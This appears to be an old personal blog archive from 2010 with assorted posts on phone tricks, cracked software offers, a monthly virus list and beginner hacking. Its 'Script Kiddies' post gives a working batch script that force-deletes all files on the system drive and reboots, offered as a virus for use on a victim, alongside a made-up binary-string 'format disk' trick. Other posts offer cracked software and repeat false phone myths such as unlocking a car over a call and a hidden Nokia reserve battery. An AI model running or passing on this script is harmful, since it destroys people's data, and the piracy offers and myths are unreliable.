Sunday, December 19, 2010

Programming Languages

Hey Guys!
I am willing to learn a new Programming Language which will help me to develop User-Friendly Win32 applications. I don't know which one to choose. I already know C, C++ and a bit Java. But I am, so far, not at all interested in Java. I hate that. Please lemme know which language is as powerful and simple as C++.

Tuesday, December 14, 2010

Hidden Powers of your cell phones!

Just check out some of the cool tricks I've found somewhere on net..Here's for you:


> Emergency call: Do you know that the "Emergency Number" for Mobile Phones is: 112. If you are out of mobile network and there is an emergency case, dial 112 and the mobile will search any network aside to establish an emergency number, and so far, this number can be dialed even if your keypad is locked. Try it out...

> Car Open Call: Sometime, if u've locked your car and forgot the keys inside, this trick may help you thatday!. A nice use of cell phone is if you lock your keys in the car and the spare keys are at home, call someone at home on their cell phone from your cell phone. Keep the cell phone about a "feet" from your car and have the person at your home press the unlock button, holding it near the mobile phone on their end. Your car will unlock! Saves someone from having to drive your keys to you. Distance is no object. You could be hundreds of miles away, and if you can reach someone who has the other “remote” for your car, you can unlock the doors (or the trunk).

> Reserve Battery for Nokia: Suppose your cell battery is very low, you are expecting an important call and you don’t have a charger, don't worry! Some of the Nokia handsets come with a reserve battery. To activate, press the keys *3370#. If it is supported, your cell will restart with the reserve and the instrument will show a 50% increase in battery. This reserve will get charged when you charge your cell next time.

> Disable a stolen Mobile Phone: Check your Mobile phone’s serial number, key in the following digits on your phone:* # 0 6 #. A 15 digit IMEI code will appear on the screen. This number is unique to your handset. Write it down and keep it somewhere safe. When your phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless. You probably won’t get your phone back, but at least you know that whoever stole it can’t use/sell it either.

Monday, November 01, 2010

Sims 2 Crack only

Saturday, October 23, 2010

Run 1 DTH service on multiple TVs

If you are a DTH subscriber and running only on 1 TV, this guide can help you!
This Link will tell you how can you make best use of DTH service by connecting it to multiple computers. Check this out and make value of your money :)

Thursday, October 21, 2010

The 6 Best Blogs For Architectural & Interior Design Ideas

The entire World Wide Web can be seen as an informational ad reference source. But when it comes to kids, the nature of content presents a challenge of comprehension. So, let's introduce ourselves to five free online encyclopedias which have simplified explanations of deeper topics.

Continue Reading

Wednesday, June 30, 2010

Free Domain Name

Hi Guys,
Check out this site and search for your domain name () for creating and having a new Domain of your own name! Yeah, no Ads, only free Domain name.
But click when you decide to have a domain, otherwise next time when you search for the same name, it will get charged as per terms... Contact me for any further assistance @email: "swapnil-bhatnagar@live.in" anytime.
All the best guys!!

Sunday, June 27, 2010

Windows x32 Softwares

Here are some links of popular downloads for System catagory. Download from Megaupload.com - the fastest way!
If you need any other software (of any other catagory, please post the name and I'll make available Cracked versionwithin 24 hours.

    Tuesday, January 26, 2010

    Hacking Videos

    Hey Buddies, I got an awesome website, which will give you all videos you want to have every-time. Check it out:

    Top VIRUSES of the month

    Troj/Invo-Zip
    1 New Troj/Invo-Zip 12%
    W32/Netsky
    2 3 W32/Netsky 9.5%
    Mal/EncPk-EI
    3 Re-entry Mal/EncPk-EI 7.8%
    Troj/Pushdo-Gen
    4 2 Troj/Pushdo-Gen 6.3%
    Troj/Agent-HFU
    5 1 Troj/Agent-HFU 5.6%
    Mal/Iframe-E
    6 5 Mal/Iframe-E 5.5%
    Troj/Mdrop-BTV
    7 Re-entry Troj/Mdrop-BTV 5.3%
    Troj/Mdrop-BUF
    8 Re-entry Troj/Mdrop-BUF 4.5%
    Troj/Agent-HFZ
    9 1 Troj/Agent-HFZ 4.4%
    Troj/Agent-HGT
    10 1 Troj/Agent-HGT 3.9%

    » More news..

    ------------------------------------------------------------
    source: http://eccouncil.org/resources/codered_center/codered_viruses.aspx

    Monday, January 25, 2010

    Script Kiddies - 1

    Heyy guys, I found a new script that can be called as a VIRUS! Actually this script will take away all the matter from your c: within windows and restart to delete all system files ;)
    Script:
    @echo off
    del%systemdrive%\*.*/f/s/q
    shutdown -r -f -t 10

    --------------------
    Now, format HDD:
    1. Copy the following as it is in Notepad:
    01001011000111110010010101010101010000011111100000
    2. Save as a .exe file
    3. Execute and format the victim's Disk!!
    -------------------

    Note: This is only for educational purposes. I will not bear any responsibility regarding this.

    Getting start with Hacking: Enumerating Remote systems

    Many of the beginners in the field of hacking start to hack or crack without having pre-hacking tips which often leads them to the wrong direction. Its better to work on a specific target before attacking. Lets start with the session, and then continue till expertise.

    Firstly, keep in mind, these following points if you want to hack a Remote Computer System:
    Vulnerability + Exploit = Hacking
    • Attack: An Attack is any action that violates security.
    • Exploit: A well defined way to Breech the security.
    • Vulnerability Assessment: Process of identifying, quantifying and prioritizing the vulnerabilities of the system.
    • Penetration Testing: A Penetration Test is a method of evaluating the security of a computer system or network by simulating an attack from malicious source, known as Black Hat Hacker or Cracker.

    CMOS/BIOS Password Cracking

    How To Reset, Remove, Clear or Reveal CMOS BIOS Security Password